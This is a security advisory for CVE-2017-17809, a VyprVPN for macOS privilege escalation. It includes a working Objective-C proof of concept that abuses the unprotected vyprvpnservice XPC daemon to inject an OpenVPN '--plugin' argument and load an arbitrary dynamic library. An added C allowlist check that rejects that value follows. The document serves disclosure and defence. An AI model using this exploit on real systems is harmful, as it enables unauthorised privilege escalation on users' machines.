[VS-2017-007] VyprVPN for MacOS Privilege Escalation Vulnerability

Download: https://www.goldenfrog.com/vyprvpn
CVE: CVE-2017-17809
Author: Benjamin Watson of VerSprite Security
Affected: < 2.15.0.5828

Vulnerability Details

VyprVPN's vyprvpnservice launch daemon exposes an unprotected XPC service that allows attackers to update the underlying OpenVPN configuration and the arguments passed to the OpenVPN binary when it is executed. An attacker can abuse this vulnerability to force the VyprVPN application to load a malicious dynamic library every time a new connection is made.

Exploitation

PoC

// Make XPC connection
NSLog(@"[+] Connecting to vyprvpnservice [!]");
xpc_connection_t connection = xpc_connection_create_mach_service("vyprvpnservice", NULL, 0);
assert(connection);
NSLog(@"[+] Service connection successful [!]");
// Set XPC event handler
xpc_connection_set_event_handler(connection, ^(xpc_object_t event) {
    NSLog(@"[+] Received response from XPC service event handler [!]");
    char *description = xpc_copy_description(event);
    NSLog(@"[+] %s", description);
    free(description);
});
// Resume connection
xpc_connection_resume(connection);
// Build payload
NSLog(@"[+] Building XPC dictionary [!]");
xpc_object_t payload = xpc_dictionary_create(NULL, NULL, 0);
// {+} {"RequestedKey":"openvpn_additional_params","Value":"--plugin \/path\/to\/dylib","Action":"set"}
NSDictionary *dict = [[NSDictionary alloc] initWithObjectsAndKeys:@"openvpn_additional_params", 
              @"RequestedKey", 
              @"--plugin /Users/rotlogix/Development/Plugin/libPlugin", 
              @"Value", @"set", 
              @"Action", nil];
NSData *json = [NSJSONSerialization dataWithJSONObject:dict options:NSJSONWritingPrettyPrinted error:NULL];
xpc_dictionary_set_data(payload, "data", json.bytes, json.length);
NSLog(@"[+] XPC dictionary creation finished [!]");
// Send the XPC message
NSLog(@"[+] Sending XPC message with updated params --plugin /Users/rotlogix/Development/Plugin/libPlugin [!]");
xpc_connection_send_message_with_reply(connection, payload, NULL, ^(xpc_object_t event) {
    size_t dataLength;
    NSLog(@"[+] Received response from XPC service [!]");
    char *description = xpc_copy_description(event);
    NSLog(@"[+] %s", description);
    free(description);
    const void *returnData = xpc_dictionary_get_data(event, "data", &dataLength);
    NSData *myData = [NSData dataWithBytes:returnData length:dataLength];
    assert(myData);
    // JSONObjectWithData: returns the parsed object (id), not an NSJSONSerialization instance
    id json = [NSJSONSerialization JSONObjectWithData:myData options:NSJSONReadingMutableLeaves error:NULL];
    NSLog(@"[+] %@", json );
});
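
Mitigation sketch

A server-side check the daemon could apply to the Value of an openvpn_additional_params "set" request before it reaches the OpenVPN command line, as an added example (not VerSprite's or the vendor's code, and not the actual fix). The function names, the length limit and the allowlist contents are assumptions; the check complements, rather than replaces, authenticating the XPC client.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define MAX_PARAMS_LEN 256

/* Assumed policy: the only options a client may add, with the number of
 * numeric arguments each takes. Anything else, --plugin included, fails. */
static const struct { const char *name; int nargs; } ALLOWED[] = {
    { "--verb", 1 }, { "--mute", 1 }, { "--ping", 1 }, { "--float", 0 },
};

/* Copy the next whitespace-delimited token into tok; false when none is left. */
static bool next_token(const char **p, char *tok) {
    size_t n = 0;
    while (**p && isspace((unsigned char)**p)) (*p)++;
    while (**p && !isspace((unsigned char)**p)) tok[n++] = *(*p)++;
    tok[n] = '\0';
    return n > 0;
}

static bool is_small_number(const char *s) {
    size_t len = strlen(s);
    if (len == 0 || len > 4) return false;
    for (; *s; s++) if (!isdigit((unsigned char)*s)) return false;
    return true;
}

/* True only if every token is an allowlisted option with valid arguments. */
bool openvpn_params_allowed(const char *value) {
    char tok[MAX_PARAMS_LEN + 1];   /* large enough for any accepted input */
    if (value == NULL || strlen(value) > MAX_PARAMS_LEN) return false;
    for (const char *p = value; next_token(&p, tok); ) {
        int nargs = -1;
        for (size_t i = 0; i < sizeof ALLOWED / sizeof ALLOWED[0]; i++)
            if (strcmp(tok, ALLOWED[i].name) == 0) nargs = ALLOWED[i].nargs;
        if (nargs < 0) return false;            /* option not allowlisted */
        for (; nargs > 0; nargs--)              /* consume its arguments */
            if (!next_token(&p, tok) || !is_small_number(tok)) return false;
    }
    return true;
}

int main(void) {   /* the Value from the PoC request on this page is rejected */
    const char *poc = "--plugin /Users/rotlogix/Development/Plugin/libPlugin";
    printf("PoC value allowed: %d\n", openvpn_params_allowed(poc));
    return 0;
}
```

Passing the validated tokens to OpenVPN as separate argv entries, rather than as one re-parsed string, keeps what was checked identical to what is executed.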